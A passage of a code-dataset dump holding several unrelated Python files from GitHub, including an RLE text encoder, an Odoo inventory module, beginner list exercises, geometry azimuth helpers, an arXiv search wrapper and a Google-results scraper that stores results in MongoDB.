send_image(image):\n if image[-1] == '/': # directory\n return send_dir(image)\n else:\n return static_file(image, root='/home/djh/Dropbox/Photographs')\n\n# Display a set\n@prism.route('/sets')\n@prism.route('/sets/')\n@prism.route('/sets/')\ndef view_set(setid='Stranger'):\n return template('Hello {{setid}}, how are you today?', setid=setid)\n\n# Display a collection of sets and collections\n@prism.route('/collections')\n@prism.route('/collections/')\ndef view_set(collectionid='Stranger'):\n return template('Hello {{collectionid}}, how are you today?',\n collectionid=collectionid)\n\nrun(prism, host='localhost', port=8080, debug=True)\n","repo_name":"dannyman/prism","sub_path":"run_server.py","file_name":"run_server.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10660037856","text":"import json\nfrom enum import Enum, auto\n\n\nclass ASCIITransportFormat:\n\n class SupportedTypes(Enum):\n FILE = auto()\n JSON = auto()\n STRING = auto()\n\n def __init__(\n self,\n data_type: SupportedTypes=None,\n data: str=None,\n encoded: bool=False,\n ) -> None:\n \"\"\"ASCIITransportFormat constructor.\n Parameters:\n data_type: can currently be FILE, JSON, or STRING enums, data_type\n of constructing data, refer to SupportedTypes enum\n data: a filename, JSON string, or ASCII string, used to\n construct object\n encoded: bool that says whether the input data is encoded\n Returns: None\n \"\"\"\n # Initialize needed object flags.\n self.encoded = encoded\n self.pseudo_encode = False\n\n # Return and call the correct functions depending on data_type.\n if (data_type and data_type in ASCIITransportFormat.SupportedTypes):\n {\n ASCIITransportFormat.SupportedTypes.FILE:\n self._populate_with_filename,\n ASCIITransportFormat.SupportedTypes.JSON:\n self._populate_with_json,\n ASCIITransportFormat.SupportedTypes.STRING:\n self._populate_with_string,\n }.get(data_type)(data)\n else:\n raise ValueError('Constructor used incorrectly.')\n\n def encode(self, force: bool=False) -> None:\n \"\"\"Encode the current object's 
data.\n Parameters:\n force: Flag to prevent accidentally re-encoding, encoded data.\n Returns: None\n \"\"\"\n if not force and self.encoded:\n raise ValueError(\n 'Cannot encode already encoded data. Try setting the '\n '`force` flag if you believe your usage is correct. '\n 'This may cause unexpected behavior.'\n )\n else:\n # Encode the actual data and record the result.\n encoded_result = ASCIITransportFormat.encode_data(self.data)\n if len(encoded_result) < len(self.data):\n # If actually compressed, then use compressed version\n # which is not pseudo encoded.\n self.data = encoded_result\n self.psuedo_encode = False\n else:\n # If compression is larger than original, don't use the larger\n # version and enable pseudo encoding.\n self.pseudo_encode = True\n # Set encoded flag if this function was run.\n self.encoded = True\n\n def decode(self) -> None:\n \"\"\"Decodes the current object's data.\n Parameters:\n Returns: None\n \"\"\"\n if not self.encoded:\n raise ValueError('Cannot decode already decoded data.')\n elif not self.pseudo_encode:\n # Only run decode if not pseudo encoded.\n self.data = ASCIITransportFormat.decode_data(self.data)\n # Reset encode flags since this is now decoded.\n self.encoded = False\n self.pseudo_encode = False\n\n def encode_data(data: str) -> str:\n \"\"\"Encodes a string and returns the result.\n Parameters:\n data: String to encode.\n Returns: The encoded string result.\n \"\"\"\n # Empty data should return an empty string.\n if not data:\n return ''\n\n # Count + char elements held in a list before joining at the end.\n encoded_elements = []\n\n # FSM to implement encoding.\n current_char, current_count = None, 0\n for char in data:\n # Count repeating characters, increment when repeating characters\n # are found and store the count + char when char stops repeating.\n if current_char is None:\n # Set the char to the current char if nothing has been set yet.\n current_char = char\n current_count += 1\n elif current_char != char:\n # Store pair and reset state if character not repeating a pair\n # will look like '3a' for a run of 3 repeating 'a' chars.\n encoded_elements.append(str(current_count)+current_char)\n current_char = char\n current_count = 1\n else:\n # Increment for repeats.\n current_count += 1\n\n # Store the very last pair of count + char.\n encoded_elements.append(str(current_count)+current_char)\n\n # Return a string that can be easily stored and transported\n # a space is used as a delimiter here between count + char pairs.\n # i.e. 
'3a 3b 5c 1e'\n return ' '.join(encoded_elements)\n\n def decode_data(data: str) -> str:\n \"\"\"Decodes an encoded string and returns the result.\n Parameters:\n data: Encoded data to decode.\n Returns: The decoded string result.\n \"\"\"\n # Empty data should return an empty string.\n if not data:\n return ''\n\n # Initialize empty string to build decoded string.\n decoded_string = ''\n\n # FSM to implement decoding.\n space_seen = False\n\n # This is the string that tracks our current count + char pair.\n current_element = ''\n for char in data:\n # If a space is seen and the current char is a space,\n # then we have double spaces, this means that only the second one\n # is our delimiter and we want to use the first space as a run.\n if space_seen and char != ' ':\n # A current element will look like '10a ' where\n # current_element[:-2] will be the count, '10' and\n # current_element[-2] will be the 'a' the character\n # current_element[-1] which is the delimiter which we ignore.\n decoded_string += (\n int(current_element[:-2]) * current_element[-2])\n\n # Reset space seen and set current_element to the new char.\n space_seen = False\n current_element = char\n else:\n # Append count + char pair to current element.\n # This is used to isolate runs of characters.\n current_element += char\n\n # Note that we see a space, this is our delimiter.\n if char == ' ':\n space_seen = True\n\n # Add the final count + char pair/element, no trailing space at end.\n decoded_string += int(current_element[:-1]) * current_element[-1]\n\n return decoded_string\n\n def json(self) -> str:\n \"\"\"Decodes an encoded string and returns the result.\n Parameters:\n Returns: String representing a JSON on object data.\n \"\"\"\n return json.dumps(self.__dict__)\n\n def get_data(self) -> str:\n \"\"\"Object data accessor.\n Parameters:\n Returns: The object's data.\n \"\"\"\n return self.data\n\n def is_encoded(self) -> bool:\n \"\"\"Object encoded flag accessor.\n Parameters:\n Returns: Whether the current data is encoded or not.\n \"\"\"\n return self.encoded\n\n def _populate_with_filename(self, data: str) -> None:\n \"\"\"Private function populates object with data from a file.\n Parameters:\n data: File name.\n Returns: None\n \"\"\"\n with open(data) as f:\n self.data = f.read()\n\n def _populate_with_json(self, data: str) -> None:\n \"\"\"Private function populates object with data from a JSON.\n Parameters:\n data: String representing JSON.\n Returns: None.\n \"\"\"\n new_data = json.loads(data)\n self._populate_with_dict(new_data)\n\n def _populate_with_dict(self, data: dict) -> None:\n \"\"\"Private function populates object with data from a dict.\n Parameters:\n data: dict representing an ASCIITransportFormat's __dict__.\n Returns: None\n \"\"\"\n self.data = data['data']\n self.encoded = data['encoded']\n self.pseudo_encode = data['pseudo_encode']\n\n def _populate_with_string(self, data: str) -> None:\n \"\"\"Private function populates object with data from a string.\n Parameters:\n data: String to directly populate data with.\n Returns: None\n \"\"\"\n self.data = data\n","repo_name":"edmundloo/ASCIITransportFormat","sub_path":"ascii_transport_format.py","file_name":"ascii_transport_format.py","file_ext":"py","file_size_in_byte":8434,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"2904122373","text":"from datetime import datetime \nfrom odoo import api, fields, models, _\n\nclass Inventory(models.Model):\n _inherit = 
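`ASCIITransportFormat` above is a run-length codec with a space-delimited "count + char" wire format ('3a 3b 5c 1e'), plus extra bookkeeping for pseudo-encoding and for runs of spaces. The core round trip is compact on its own; a simplified sketch follows, assuming the plaintext contains no spaces (the full class handles that case via its double-space rule).

```python
# Simplified run-length round trip in the same "3a 3b 5c 1e" wire format.
# Assumes the plaintext contains no spaces; the class above also handles spaces.
def rle_encode(text: str) -> str:
    if not text:
        return ''
    tokens, prev, count = [], text[0], 1
    for ch in text[1:]:
        if ch == prev:
            count += 1
        else:
            tokens.append(f'{count}{prev}')
            prev, count = ch, 1
    tokens.append(f'{count}{prev}')
    return ' '.join(tokens)

def rle_decode(encoded: str) -> str:
    if not encoded:
        return ''
    return ''.join(int(tok[:-1]) * tok[-1] for tok in encoded.split(' '))

sample = 'aaabbbccccce'
assert rle_encode(sample) == '3a 3b 5c 1e'
assert rle_decode(rle_encode(sample)) == sample
```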
\"stock.inventory\"\n _description = \"Inventory\"\n _order = \"date desc, id desc\"\n\n name = fields.Char(\n 'Inventory Reference',\n readonly=True, required=False,\n states={'draft': [('readonly', False)]}, compute='_compute_cycle_count_name')\n\n cycle_count_name = fields.Char(\n 'Inventory Reference',\n readonly=True, required=True,\n states={'draft': [('readonly', False)]}, default=lambda self: self.env.user.partner_id.name + datetime.now().strftime(\"%Y-%m-%d-%H:%M:%S\"),)\n\n cycle_count_filter = fields.Selection(\n string='Inventory of', selection='_selection_filter_cycle_count',\n required=True,\n default='none',\n help=\"If you do an entire inventory, you can choose 'All Products' and it will prefill the inventory with the current stock. If you only do some products \"\n \"(e.g. Cycle Counting) you can choose 'Manual Selection of Products' and the system won't propose anything. You can also let the \"\n \"system propose for a single product / lot /... \")\n\n location_id = fields.Many2one(\n 'stock.location', 'Inventoried Location',\n readonly=True, required=True,\n states={'draft': [('readonly', False)]},\n default=None)\n\n def _compute_cycle_count_name(self):\n for record in self:\n record.name = record.cycle_count_name\n\n @api.model\n def _selection_filter_cycle_count(self):\n \"\"\" Get the list of filter allowed according to the options checked\n in 'Settings\\Warehouse'. \"\"\"\n res_filter = [\n ('none', _('All products')),]\n return res_filter\n\n @api.multi\n def cycle_count_action_start(self):\n for inventory in self.filtered(lambda x: x.state not in ('done','cancel')):\n vals = {'state': 'confirm', 'date': fields.Datetime.now()}\n if (inventory.filter != 'partial') and not inventory.line_ids:\n vals.update({'line_ids': [(0, 0, line_values) for line_values in inventory.cycle_count_get_inventory_lines_values()]})\n inventory.write(vals)\n tree_view_id = self.env.ref('stock.view_inventory_tree').id\n form_view_id = self.env.ref('cycle_count.cycle_count_view_inventory_form').id\n return {\n 'name': _('Inventory Adjustments'),\n 'type': 'ir.actions.act_window',\n 'views': [(form_view_id, 'form'), (tree_view_id, 'tree'),],\n 'view_mode': 'tree, form',\n 'view_type': 'form',\n 'target': 'current',\n 'res_id': inventory.id,\n 'res_model': 'stock.inventory',\n 'context': {'form_view_initial_mode': 'edit', 'force_detailed_view': 'true'},\n }\n\n def cycle_count_get_inventory_lines_values(self):\n # TDE CLEANME: is sql really necessary ? 
I don't think so\n locations = self.env['stock.location'].search([('id', 'child_of', [self.location_id.id])])\n domain = ' location_id in %s AND quantity != 0 AND active = TRUE'\n args = (tuple(locations.ids),)\n\n vals = []\n Product = self.env['product.product']\n # Empty recordset of products available in stock_quants\n quant_products = self.env['product.product']\n # Empty recordset of products to filter\n products_to_filter = self.env['product.product']\n\n # case 0: Filter on company\n if self.company_id:\n domain += ' AND company_id = %s'\n args += (self.company_id.id,)\n\n #case 1: Filter on One owner only or One product for a specific owner\n if self.partner_id:\n domain += ' AND owner_id = %s'\n args += (self.partner_id.id,)\n #case 2: Filter on One Lot/Serial Number\n if self.lot_id:\n domain += ' AND lot_id = %s'\n args += (self.lot_id.id,)\n #case 3: Filter on One product\n if self.product_id:\n domain += ' AND product_id = %s'\n args += (self.product_id.id,)\n products_to_filter |= self.product_id\n #case 4: Filter on A Pack\n if self.package_id:\n domain += ' AND package_id = %s'\n args += (self.package_id.id,)\n #case 5: Filter on One product category + Exhausted Products\n if self.category_id:\n categ_products = Product.search([('categ_id', 'child_of', self.category_id.id)])\n domain += ' AND product_id = ANY (%s)'\n args += (categ_products.ids,)\n products_to_filter |= categ_products\n\n self.env.cr.execute(\"\"\"SELECT product_id, sum(quantity) as product_qty, location_id, lot_id as prod_lot_id, package_id, owner_id as partner_id\n FROM stock_quant\n LEFT JOIN product_product\n ON product_product.id = stock_quant.product_id\n WHERE %s\n GROUP BY product_id, location_id, lot_id, package_id, partner_id \"\"\" % domain, args)\n\n for product_data in self.env.cr.dictfetchall():\n # replace the None values in the dictionary by False, because falsy values are tested later on\n for void_field in [item[0] for item in product_data.items() if item[1] is None]:\n product_data[void_field] = False\n product_data['theoretical_qty'] = product_data['product_qty']\n if product_data['product_id']:\n product_data['product_uom_id'] = Product.browse(product_data['product_id']).uom_id.id\n quant_products |= Product.browse(product_data['product_id'])\n vals.append(product_data)\n if self.exhausted:\n exhausted_vals = self._get_exhausted_inventory_line(products_to_filter, quant_products)\n vals.extend(exhausted_vals)\n cycle_count_values = []\n for i in vals:\n if i['theoretical_qty'] >= 1:\n i['product_qty'] = i['theoretical_qty']\n cycle_count_values.append(i) \n return cycle_count_values","repo_name":"andriisem/odoosh","sub_path":"cycle_count/models/stock_inventory.py","file_name":"stock_inventory.py","file_ext":"py","file_size_in_byte":6069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
{"seq_id":"9362971051","text":"print('--------- Task 1 ----------')\n'''\n1. Create a list and fill it with elements of various data types. Implement a script\nthat checks the data type of each element. Use the type() function for the type check.\nThe list elements do not have to be requested from the user; they can be specified explicitly in the program.\n2. For the list, implement swapping of the values of neighboring elements. Values are exchanged by\n'''\n\nlst = [1, 1.0, 'a', True, ['b', 2], {1:'a'}, ('a', 3), None]\nfor i in lst:\n print(type(i))\n\n\nprint('--------- Task 2 ----------')\n'''\n2. For the list, implement swapping of the values of neighboring elements. 
Values are exchanged by\nelements with indices 0 and 1, 2 and 3, and so on. If the number of elements is odd, keep the last one\nin its place. Use the input() function to fill the list with elements.\n\n'''\n\nlst = [1, 'a', 2, 'b', 3]\nfor i in range(0, len(lst)-1, 2):\n lst[i], lst[i + 1] = lst[i + 1], lst[i]\n\nprint(lst)\n\nprint('--------- Task 3 ----------')\n'''\n3. The user enters a month as an integer from 1 to 12. Report which season of the year\nthe month belongs to (winter, spring, summer, autumn). Write solutions using a list and a dict.\n'''\n\n\ndct = {9:'Autumn', 10:'Autumn', 11:'Autumn', 12:'Winter', 1:'Winter', 2:'Winter', 3:'Spring', \\\n 4:'Spring', 5:'Spring', 6:'Summer', 7:'Summer', 8:'Summer'}\n\nnum = int(input('Enter the month number: '))\n\nprint(f'It is {dct.get(num)}')\n\n\n\nlst = ['Autumn', 'Winter', 'Spring', 'Summer']\n\nm = int(input('Enter the month number: '))\n\n\nif m == 9 or m == 10 or m == 11:\n print(f'It is {lst[0]}')\nelif m == 12 or m == 1 or m == 2:\n print(f'It is {lst[1]}')\nelif m == 3 or m == 4 or m == 5:\n print(f'It is {lst[2]}')\nelse:\n print(f'It is {lst[3]}')\n\nprint('--------- Task 4 ----------')\n'''\n4. The user enters a string of several words separated by spaces. Print each\nword on a new line. The lines must be numbered. If a word is long, print only\nthe first 10 letters of the word.\n\n'''\n\n\nst = 'The user enters a string of several words'\nst = st.split()\nfor i in st:\n if len(i) > 10:\n print(i[0:10])\n else:\n print(i)\n\nprint('--------- Task 5 ----------')\n'''\n5. Implement a \"Rating\" structure, which is a set of natural numbers that\ndoes not increase. A new rating element must be requested from the user. If the rating\ncontains elements with the same value, the new element with that value\nmust be placed after them.\n\n\n'''\n\nmy_list = [7, 5, 3, 3, 2]\nprint(my_list)\n\nnum = float(input('Enter number: ')) # a float number so it is easier to trace\n\nfor i in range(0, len(my_list)-1):\n if num > max(my_list):\n my_list.insert(0, num)\n break\n elif num <= min(my_list):\n my_list.append(num)\n break\n elif my_list[i] >= num and my_list[i + 1] < num:\n my_list.insert(i + 1, num)\n break\n \nprint(my_list)\n\nprint('--------- Task 6 ----------')\n'''\n6. *Implement a \"Goods\" data structure. It should be a list of tuples.\nEach tuple stores information about an individual product. A tuple must contain two\nelements: the product number and a dictionary of parameters (the product characteristics:\nname, price, quantity, unit of measure). The structure must be built programmatically,\nrequesting all the data from the user.\nAnalytics about the goods must be collected. Implement a dictionary in which each key is\na product characteristic, for example, the name. 
Then the value is a list\nof characteristic values, for example, a list of product names.\n'''\n\nx = 0\ndct = {}\ntpl = ()\nlst = []\nwhile 1:\n x += 1\n dct = {}\n name = input('Name: ')\n if name == 'q':\n break\n dct.update({'Name':name})\n price = input('Price: ')\n dct.update({'Price':price})\n quantity = input('Quantity: ')\n dct.update({'Quantity':quantity})\n unit = input('Unit: ')\n dct.update({'Unit':unit})\n tpl = (x, dct)\n lst.append(tpl)\n\nprint('\\n', lst, '\\n')\n\nanalytics = {}\nls_name = []\nls_price = []\nls_quantity = []\nls_unit = []\nfor i in range(0, len(lst)):\n ls_name.append(lst[i][1]['Name'])\n ls_price.append(lst[i][1]['Price'])\n ls_quantity.append(lst[i][1]['Quantity'])\n ls_unit.append(lst[i][1]['Unit'])\n st_unit = set(ls_unit) # Remove duplicates \n ls_unit = list(st_unit) # Turn back into a list\n analytics.update({'Name':ls_name})\n analytics.update({'Price':ls_price})\n analytics.update({'Quantity':ls_quantity})\n analytics.update({'Unit':ls_unit})\n \nprint(analytics)\n","repo_name":"VDK45/45","sub_path":"Lesson_2.py","file_name":"Lesson_2.py","file_ext":"py","file_size_in_byte":6145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
{"seq_id":"5402424780","text":"\ndef printGreeting():\n print(\"Wassup cuz\")\n\ndef readFile(filename):\n exam = {} \n tempList = []\n inFile = open(filename,\"r\")\n for line in inFile:\n tempList = line.strip().split()\n exam[tempList[0]] = tempList[1]\n return exam \n\ndef findMean(scores):\n total = 0\n average = 0\n counter = 0\n for i in range(len(scores)):\n total += int(scores[i])\n counter += 1\n average = total / counter \n return average\n\ndef main():\n exam = {}\n filename = \"\"\n average = 0\n printGreeting()\n filename = input(\"input file name: \")\n exam = readFile(filename) \n score = list(exam.values())\n score.sort()\n average = findMean(score)\n lowest = score[0]\n length = len(score) - 1\n highest = score[length]\n print(\"The average score is \", average)\n print(\"Lowest Score is : \", lowest)\n print(\"Highest score is: \", highest)\nmain()\n","repo_name":"kn33hit/Coursework","sub_path":"GL_backup/201/LABS/LAB13/lab13.py","file_name":"lab13.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
{"seq_id":"31960805627","text":"import math\nimport numpy as np\nfrom shapely import wkt\nfrom haversine import haversine, Unit\nfrom shapely.geometry import Point, LineString\n\n\ndef coords_pair_dist(o, d, xy=True):\n if isinstance(o, Point) and isinstance(d, Point):\n return haversine((o.y, o.x), (d.y, d.x), unit=Unit.METERS)\n \n if (isinstance(o, tuple) and isinstance(d, tuple)) or \\\n (isinstance(o, list) and isinstance(d, list)):\n if xy:\n return haversine(o[:2][::-1], d[:2][::-1], unit=Unit.METERS)\n else:\n return haversine(o[:2], d[:2], unit=Unit.METERS)\n \n return np.inf\n\n\ndef azimuth_diff(a, b, unit='radian'):\n \"\"\"calculate the angle diff between two azimuth\n Args:\n a ([type]): Unit: degree\n b ([type]): Unit: degree\n unit(string): radian or degree\n Returns:\n [type]: [description]\n \"\"\"\n diff = abs(a-b)\n\n if diff > 180:\n diff = 360-diff\n\n return diff if unit =='degree' else diff*math.pi/180\n\n\ndef azimuthAngle(x1, y1, x2, y2):\n \"\"\"calculate the azimuth angle from (x1, y1) to (x2, y2)\n\n Args:\n x1 (float): [description]\n y1 (float): [description]\n x2 (float): [description]\n y2 (float): [description]\n\n Returns:\n float: The angle 
in degree.\n \"\"\"\n angle = 0.0\n dx, dy = x2 - x1, y2 - y1\n\n if dx == 0:\n angle = math.pi * 0\n if y2 == y1 :\n angle = 0.0\n elif y2 < y1 :\n angle = math.pi\n elif dy == 0:\n angle = 0\n if dx > 0:\n angle = math.pi / 2.0\n else:\n angle = math.pi / 2.0 * 3.0\n elif x2 > x1 and y2 > y1:\n angle = math.atan(dx / dy)\n elif x2 > x1 and y2 < y1 :\n angle = math.pi / 2 + math.atan(-dy / dx)\n elif x2 < x1 and y2 < y1 :\n angle = math.pi + math.atan(dx / dy)\n elif x2 < x1 and y2 > y1 :\n angle = 3.0 * math.pi / 2.0 + math.atan(dy / -dx)\n\n return angle * 180 / math.pi\n\n\ndef cal_polyline_azimuth(geom):\n \"\"\"calculate the azimuth of a polyline.\n\n Args:\n geom (LineString): The polyline geometry.\n\n Returns:\n [list]: The list of azimuth.\n \"\"\"\n if isinstance(geom, LineString):\n coords = geom.coords[:]\n if isinstance(geom, list):\n coords = geom\n seg_angels = [azimuthAngle( *coords[i], *coords[i+1] ) for i in range(len(coords)-1) ]\n\n return seg_angels\n\n\ndef cal_points_azimuth(geoms:list):\n \"\"\"calculate the azimuth of a trajectory.\n\n Args:\n geom (LineString): The polyline geometry.\n\n Returns:\n [list]: The list of azimuth.\n \"\"\"\n if not geoms or not geoms[0]:\n return None\n if not isinstance( geoms[0], Point):\n return None\n \n coords = [ g.coords[0] for g in geoms ]\n seg_angels = [azimuthAngle( *coords[i], *coords[i+1] ) for i in range(len(coords)-1) ]\n \n return seg_angels\n\n\ndef azimuth_cos_similarity(road_angels, head_azimuth):\n # Ref: https://www.cnblogs.com/bymo/p/8489037.html\n val = np.mean(\n np.cos(\n [(azimuth_diff(i, head_azimuth) * math.pi/180) for i in road_angels ]\n )\n )\n \n return val\n\n\ndef azimuth_cos_similarity_for_linestring(geom, head_azimuth, weight=True):\n if isinstance(geom, LineString):\n coords = geom.coords[:]\n if isinstance(geom, list):\n coords = geom\n \n road_angels = cal_polyline_azimuth(coords)\n\n lst = np.cos( [(azimuth_diff(i, head_azimuth) * math.pi/180) for i in road_angels ])\n if not weight:\n val = np.mean(lst)\n else:\n weights = np.array([coords_pair_dist(coords[i], coords[i+1], xy=True) for i in range(len(coords)-1)]) \n val = np.average(lst, weights=weights)\n \n return val\n \n\nif __name__ == '__main__':\n p0 = wkt.loads('POINT (113.934151 22.577512)')\n p1 = wkt.loads('POINT (113.934144 22.577979)')\n # net.df_edges.loc[82190].geometry\n polyline = wkt.loads('LINESTRING (113.9340705 22.577737, 113.9340788 22.5777828, 113.934093 22.5778236, 113.9341161 22.5778661, 113.934144 22.5779051, 113.934186 22.57795, 113.9342268 22.5779823, 113.9342743 22.5780131, 113.9343212 22.5780352, 113.9343734 22.5780515, 113.9344212 22.5780605, 113.9344796 22.5780669)')\n\n angels = azimuthAngle(*p0.coords[0], *p1.coords[0])\n\n road_angels = cal_polyline_azimuth(polyline)\n head_azimuth = cal_points_azimuth([p0, p1])\n\n azimuth_cos_similarity(road_angels, head_azimuth[0])\n \n azimuth_cos_similarity_for_linestring(polyline, head_azimuth[0], True)\n \n azimuth_cos_similarity_for_linestring(polyline, head_azimuth[0], False)","repo_name":"wenke727/RoadNetworkCreator","sub_path":"src/utils/azimuth_helper.py","file_name":"azimuth_helper.py","file_ext":"py","file_size_in_byte":4612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
{"seq_id":"32679474130","text":"import arxiv\n\n\ndef search(query=\"\", max_results=10, sort_by=\"Relevance\", sort_order=\"Descending\"):\n\n sr_by_dict = {\"Relevance\": arxiv.SortCriterion.Relevance, \"Last Updated Date\":\n 
arxiv.SortCriterion.LastUpdatedDate, \"Submitted Date\": arxiv.SortCriterion.SubmittedDate}\n sr_or_dict = {\"Descending\": arxiv.SortOrder.Descending,\n \"Ascending\": arxiv.SortOrder.Ascending}\n\n search = arxiv.Search(\n query=query,\n max_results=max_results,\n sort_by=sr_by_dict[sort_by],\n sort_order=sr_or_dict[sort_order])\n src_lst = []\n for i in search.results():\n id = i.entry_id.split(\"/\")\n src_lst.append(i.title+\" - \" + str(id[-1]))\n\n return src_lst\n","repo_name":"ArchanGhosh/ArxivAudio","sub_path":"modules/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20840369835","text":"import queue\n\n\ndef solution(priorities, location):\n cnt = 0\n\n while priorities:\n max_num = max(priorities)\n if priorities[0] < max_num:\n priorities.append(priorities[0])\n location = locate(priorities, location)\n print(location)\n del priorities[0]\n elif priorities[0] == max_num and location != 0:\n location = locate(priorities, location)\n print(location)\n del priorities[0]\n cnt += 1\n elif priorities[0] == max_num and location == 0:\n del priorities[0]\n cnt += 1\n return cnt\n\n\ndef locate(priorities, location):\n if location - 1 < 0:\n return len(priorities) - 2\n else:\n return location - 1\n","repo_name":"PigletHong/CodingTest","sub_path":"프로그래머스/lv2/42587. 프린터/프린터.py","file_name":"프린터.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24806263740","text":"'''\r\nTitle : Google result page crawling\r\nAuthor : BC Gwak\r\nWhat to do : \r\n This source code will catch URL, title, contents \r\n from Google search result using BeautifulSoup \r\n And insert the results into Mongodb\r\n Simply use it when you want to put test data into DB\r\nNeeded packages : \r\n In order to use this source, install these packages.\r\n pip install requests\r\n pip install beautifulsoup4\r\n pip install pymongo\r\n pip install lxml\r\nHow to get the code : \r\n git clone https://github.com/kbckbc/ggcrawling.git .\r\nRun debug mode :\r\n python ggcrawling.py\r\nRun non-debug mode :\r\n python -O ggcrawling.py\r\n'''\r\n\r\nfrom tkinter import E\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom pymongo import MongoClient\r\nfrom datetime import datetime\r\n\r\nclient = MongoClient(host=\"localhost\", port=27017)\r\ndb = client.chanboard\r\ncol = db.board\r\n\r\nheader = {\"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\"}\r\ntargetsite = \"https://www.google.com/search?q={}&start={}\"\r\nkeyword = \"washu\"\r\nhowmanypages = 5\r\n\r\nfor i in range(howmanypages):\r\n url = targetsite.format(keyword, i * 10)\r\n getHtml = requests.get(url, headers=header)\r\n bs = BeautifulSoup(getHtml.text, \"lxml\")\r\n contentLists = bs.select(\"div.g\")\r\n\r\n line = 0\r\n for item in contentLists:\r\n current_utc_time = round(datetime.utcnow().timestamp() * 1000)\r\n\r\n try:\r\n site = item.select_one(\"cite\").text\r\n site = site[site.find(\"://\")+3:site.find(\" \", site.find(\"://\")+3)].replace(\"www.\", \"\").replace(\".\", \"_\")\r\n title = item.select_one(\"h3.LC20lb\").text\r\n contents = item.select_one(\"div.IsZvec\").text\r\n line = line+1\r\n if __debug__: print('''result [{}]\r\n utc_time: {}\r\n site: {}\r\n title: {}\r\n contents: {}'''.format(line, 
current_utc_time, site, title, contents))\r\n col.insert_one({\r\n \"name\": site,\r\n \"title\": title,\r\n \"contents\": contents,\r\n \"view\": 0,\r\n \"date\": current_utc_time\r\n })\r\n except Exception as e:\r\n if __debug__: print(e)\r\n pass\r\n","repo_name":"kbckbc/ggcrawling","sub_path":"ggcrawling.py","file_name":"ggcrawling.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
{"seq_id":"21518268700","text":"from __future__ import absolute_import, division, print_function\n\nimport os\n\nimport e3.anod.driver\nimport e3.anod.sandbox\nimport e3.anod.spec\n\nimport pytest\n\n\ndef test_simple_driver():\n sandbox = e3.anod.sandbox.SandBox()\n\n class Simple(e3.anod.spec.Anod):\n\n @e3.anod.spec.Anod.primitive()\n def download():\n pass\n\n with pytest.raises(e3.anod.spec.AnodError):\n anod_instance = Simple(\n qualifier='', kind='build')\n anod_instance.sandbox = None\n e3.anod.driver.AnodDriver(\n anod_instance=anod_instance,\n store=None).activate(sandbox, None)\n\n sandbox.root_dir = os.getcwd()\n anod_instance = Simple(\n qualifier='', kind='build')\n anod_instance.sandbox = sandbox\n driver = e3.anod.driver.AnodDriver(\n anod_instance=anod_instance,\n store=None)\n\n assert driver.call('why') is False\n with pytest.raises(e3.anod.spec.AnodError) as err:\n driver.download()\n\n assert '.activate() has not been called' in str(err)\n\n\ndef test_deps_driver():\n class Deps(e3.anod.spec.Anod):\n build_deps = [e3.anod.spec.Anod.Dependency(name='parent')]\n\n @e3.anod.spec.Anod.primitive()\n def build(self):\n return self.deps['parent'].parent_info\n\n sandbox = e3.anod.sandbox.SandBox()\n sandbox.root_dir = os.getcwd()\n anod_instance = Deps(qualifier='', kind='build')\n anod_instance.sandbox = sandbox\n\n spec_dir = os.path.join(os.path.dirname(__file__), 'data')\n spec_repo = e3.anod.loader.AnodSpecRepository(spec_dir)\n\n e3.anod.driver.AnodDriver(\n anod_instance=anod_instance,\n store=None).activate(sandbox, spec_repo)\n\n anod_instance.build_space.create()\n assert anod_instance.build() == 'from_parent'\n","repo_name":"AnnaKaczorowski/e3-core","sub_path":"tests/tests_e3/anod/test_driver.py","file_name":"test_driver.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"43"}
{"seq_id":"35849983419","text":"\"\"\"\n Garfield Maitland\n CS 5001\n 11/21/2023\n Lecture - protocol.py\n\"\"\"\n\nfrom Square import Square\nfrom Circle import Circle\nfrom Queue import Queue\n\n\ndef main():\n q = Queue()\n q.enqueue(Square(1))\n q.enqueue(Square(2))\n q.enqueue(Circle(1))\n q.enqueue(Square(5))\n\n print(q.front())\n print(q.back())\n\n print(\"------------\\n\")\n\n while not q.is_empty():\n print(q.front())\n print(q.dequeue().get_area())\n\n print(\"Done\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"gmaitland/CS_5001","sub_path":"Lecture/November_21/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
{"seq_id":"28113529885","text":"from typing import List\n\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n # Dictionaries allow lookup in O(1) on average because they are\n # implemented using hash tables.\n values = {}\n\n for i, value in enumerate(nums):\n # Make use of the fact that target - value equals\n # the value you're looking for.\n if target - 
